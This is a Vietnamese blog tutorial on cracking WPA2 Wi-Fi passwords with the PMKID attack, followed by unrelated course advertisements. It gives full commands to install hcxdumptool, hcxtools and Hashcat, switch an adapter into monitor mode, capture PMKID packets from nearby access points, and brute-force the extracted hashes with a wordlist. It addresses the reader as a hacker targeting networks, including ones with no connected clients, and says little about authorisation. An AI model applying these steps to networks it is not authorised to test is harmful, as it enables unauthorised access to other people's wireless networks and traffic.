Pages

Thứ Ba, 21 tháng 4, 2020

Hướng dẫn Hack Password Wifi với Hashcat -PMKID

Việc Hack Password Wifi chuẩn WPA2 gần như giống nhau trong nhiều năm nay. Hiện nay có một phương pháp tấn công Wifi mới ít phức tạp hơn các phương pháp truyền thống, đặc biệt là có thể nhắm mục tiêu các điểm truy cập không có ai kết nối. Phương pháp này sử dụng Hashcat để giải mã gói tin -PMKID nhằm bẻ khóa mật khẩu WPA và cho phép Hacker tìm các mạng có mật khẩu yếu dễ dàng hơn.

Phương pháp Hack Password WIFI cổ điển

Cách thức cũ để bẻ khóa WPA2 đã xuất hiện khá lâu và liên quan đến việc ngắt kết nối một thiết bị với điểm truy cập. Điều này có hai nhược điểm rất quan trọng đối với tin tặc Wi-Fi.

Các bài viết liên quan

Nhược điểm đầu tiên là phải có thiết bị đang kết nối với Wifi. Mật khẩu Wifi có thể yếu và rất dễ bị bẻ khóa, nhưng nếu không có thiết bị được kết nối, sẽ không có cơ hội để bắt tay (handshake), do đó không có cơ hội để thử bẻ khóa.

Xem thêm:  Cách kiểm tra kiến thức Phishing bằng bài Test của Google

Nhược điểm thứ hai, buộc bạn phải gửi các gói tin để là ngắt kết nối giữa thiết bị với Wifi. Loại can thiệp trái phép này về mặt kỹ thuật là một cuộc tấn công từ chối dịch vụ, tương đương với việc gây nhiễu mạng. Điều này có thể khiến bạn gặp rắc rối và có thể dễ dàng phát hiện bởi một số phần mềm khác.

Phương pháp Hack Password WIFI với Hashcat

Thay vì dựa vào việc chặn liên lạc hai chiều giữa các thiết bị Wi-Fi để bẻ khóa mật khẩu, Hacker có thể giao tiếp trực tiếp với điểm truy cập Wifi bằng phương pháp mới. Vào ngày 4 tháng 8 năm 2018, một bài đăng trên diễn đàn Hashcat đã nêu chi tiết một kỹ thuật mới thúc đẩy cuộc tấn công chống lại RSN IE (Robust Security Network Information Element) để nắm bắt thông tin cần thiết và thực hiện Brute-force.

Tương tự như các cuộc tấn công WPA, Hacker phải bắt được sóng Wifi muốn tấn công. Cách thức là sử dụng USB bắt Wifi tương thích Kali Linux để thử brute-buộc mật khẩu. Thay vì sử dụng Aireplay-ng hoặc Aircrack-ng, AnonyViet sẽ hướng dẫn bạn sử dụng một công cụ Hack Password Wifi mới được gọi là hcxtool.

Ưu điểm:

  • Hổ trở nhiều thuật toán mã hóa.
  • Tỉ lệ giải mã Password thành công cao.

Nhược điểm:

  • Cần cấu hình phần cứng để thực hiện giải mã (CPU, GPU).
  • Thời gian giải mã phụ thuộc vào phần cứng máy tính.

Cách sử dụng Hcxtools & Hashcat để Hack Password Wifi

Hcxdumptool và hcxpcaptool là công cụ được sử dụng để kiểm thử độ an toàn của Wifi. Tool này có chức năng quét những sóng Wifi gần khu vực của bạn. Sau đó bắt gói tin bắt tay WPA và PMKID. Sau khi có được gói tin PMKID, bạn sẽ dùng hàm băm vào Hashcat và bẻ khóa mật khẩu. Tỉ lệ bẻ khóa thành công phụ thuộc vào từ điển Password bạn có. AnonyViet sẽ cung cấp cho bạn bộ từ điển Password thông dụng nhất hiện nay.

Xem thêm:  Truy cập vào Cpanel miễn phí bằng cách sử dụng Google Dork

Chuẩn bị công cụ hack wifi

USB Wifi hổ trợ Hack Password Wifi thông dụng hiện nay:

  • TP-Link TL-WN722N v1
  • Tenda W311MA
  • Alfa AWUS036NEH
  • Alfa AWUS051NH v2
  • Alfa AWUS036NHA
  • Alfa AWUS036H
  • Alfa AWHUS036NH
  • Panda PAU05

Chuẩn bị Tool hack wifi

• hcxdumptool
• hcxtools

Cài đặt gói cần thiết:

Khởi động Kali Linux lên và mở terminal gõ lệnh sau:

git clone https://github.com/ZerBea/hcxdumptool  cd hcxdumptool  make  make install  cd

Để cài đặt hcxtools bạn gõ lệnh:

apt-get update –y  apt-get update  apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev  git clone https://github.com/ZerBea/hcxtools  cd hcxtools  make  make install  cd

Cuối cùng, bạn cần cài đặt Hashcat. Thông thường Hashcat sẽ có sẵn trong repo Kali Linux. Chỉ cần gõ như sau để cài đặt phiên bản Hashcat mới nhất.

apt install hashcat

Kết nối USB Wifi với VMWare

Gắn USB thu sóng Wifi vào máy tính của bạn. Thực hiện kết nối USB Wifi với máy ảo Kali Linux.

Kết nối USB Wifi với VMWare

Tiếp tục gõ lệnh dưới đây trong Terminal:

ip link set wlan0 down  iw dev wlan0 set type monitor  ip link set wlan0 up

Bắt gói tin PMKID

Bây giờ chúng ta sẽ bắt đầu tấn công để bắt gói tin PMKID. Hãy tắt các Router Wifi của nhà bạn cho dễ thực hiện. Bây giờ sử dụng lệnh sau để chạy hcxdumptool :

Hcxdumptool –I wlan0 –-enable_status=1 –o dump-data.pcapng

Nếu bạn nhận được thông báo như:

"NetworkManager is running with pid 1022"  Or  "wpa_supplicant is running with pid 2231"

Bạn có thể tắt thông báo bằng lệnh:

kill 1022  kill 2231

Thay thế 1022, 2231 bằng PID mà bạn nhìn thấy trên màn hình.

Xem thêm:  Hướng dẫn khai thác lỗ hổng của Sekat CMS

Chạy lại hcxdumptool một lần nửa:

Hcxdumptool –I wlan0 –-enable_status=1 –o dump-data.pcapng

Bạn để chương trình chạy khoảng hơn 10 phút để thu thập các gói tin Wifi cần Hack Password. Sau đó dừng lại bằng tổ hợp phím Ctrl + C

Bây giờ bạn sẽ thấy trong thư mục có một file tên dump-data.pcapng. Đây là file chứa nội dung các gói tin đã được bắt lại. Dùng lệnh sau để xuất gói tin PMKID ra khỏi file dump-data.pcapng.

hcxpcaptool -z hashes.txt dump-data.pcapng

Nội dung được trích xuất sẽ nằm trong thư mục hashes.txt (nếu thông báo lỗi, bạn hãy tự tạo 1 file hashes.txt trống nhé).

Để tìm ra Hash nào của Wifi nào, bạn xem tại địa chỉ MAC của thiết bị Wifi. Trong hình dưới đây, bạn có thể thấy Hash hiển thị địa chỉ MAC Wifi.

hash mac addressĐể xem thiết bị Wifi nào có địa chỉ MAC nào, tương ứng với SSID (tên Wifi) thì bạn dùng lệnh dưới đây:

airmon-ng start wlan0  airodump-ng wlan0mon

mac address name wifi

Brute Force Password Wifi với Hashcat

Bây giờ, bạn giải mã Hash ra Plain Text bằng cách dùng Worldlist. Hãy để file Wordlist chung với thư mục của hashes.txt.

hashcat –m 16800 –w 4 hash.txt (tên-file-worldlist).txt

Nếu mã Hash trùng với Password trong Worldlist thì bạn sẽ nhận được Mật khẩu để truy cập Wifi tương ứng với mã Hash và Mac Adress.

Hướng dẫn Hack Password Wifi với Hashcat -PMKID


---

Khóa học Hacker và Marketing từ A-Z trên ZALO!

Khóa học Hacker và Marketing từ A-Z trên Facebook!

Khóa đào tạo Power BI phân tích báo cáo để bán hàng thành công

Bảo mật và tấn công Website - Hacker mũ trắng
Hacker mũ trắng
KHÓA HỌC LẬP TRÌNH PYTHON TỪ CƠ BẢN ĐẾN CHUYÊN NGHIỆP

Khóa học Lập trình Visual Foxpro 9 - Dành cho nhà quản lý và kế toán

Khóa học hướng dẫn về Moodle chuyên nghiệp và hay
Xây dựng hệ thống đào tạo trực tuyến chuyên nghiệp tốt nhất hiện nay.



Khóa học AutoIt dành cho dân IT và Marketing chuyên nghiệp

Khoá học Word từ cơ bản tới nâng cao, học nhanh, hiểu sâu


Khóa học hướng dẫn sử dụng Powerpoint từ đơn giản đến phức tạp HIỆU QUẢ
Khóa học Thiết kế, quản lý dữ liệu dự án chuyên nghiệp cho doanh nghiệp bằng Bizagi
 Khoa hoc hay
Khóa học Phân tích dữ liệu sử dụng Power Query trong Excel


Khóa học Phân tích dữ liệu sử dụng TableAU - Chìa khóa thành công!
Nhấn vào đây để bắt đầu khóa học


Khóa học Phân tích dữ liệu sử dụng SPSS - Chìa khóa thành công!


Khóa học "Thiết kế bài giảng điện tử", Video, hoạt hình 
kiếm tiền Youtube bằng phần mềm Camtasia Studio
Khóa học HƯỚNG DẪN THIẾT KẾ VIDEO CLIP CHO DÂN MARKETING CHUYÊN NGHIỆP
 Xây dựng website​​​​
HƯỚNG DẪN THIẾT KẾ QUẢNG CÁO VÀ ĐỒ HỌA CHUYÊN NGHIỆP VỚI CANVA
Hãy tham gia khóa học để trở thành người chuyên nghiệp. Tuyệt HAY!😲👍
 Khoa hoc hay
MICROSOFT ACCESS



GOOGLE SPREADSHEETS phê không tưởng
 Khoa hoc hay
Khóa hoc lập trình bằng Python tại đây

Hãy tham gia khóa học để biết mọi thứ

Để tham gia tất cả các bài học, Bạn nhấn vào đây 
Khóa học sử dụng Adobe Presenter-Tạo bài giảng điện tử
 Khoa hoc hay
Design Website

Để thành thạo Wordpress bạn hãy tham gia khóa học 
Khóa học sử dụng Edmodo để dạy và học hiện đại để thành công



Cập nhật công nghệ từ Youtube tại link: congnghe.hocviendaotao.com
Tham gia nhóm Facebook
Để tham gia khóa học công nghệ truy cập link: http://thuvien.hocviendaotao.com
Mọi hỗ trợ về công nghệ email: dinhanhtuan68@gmail.com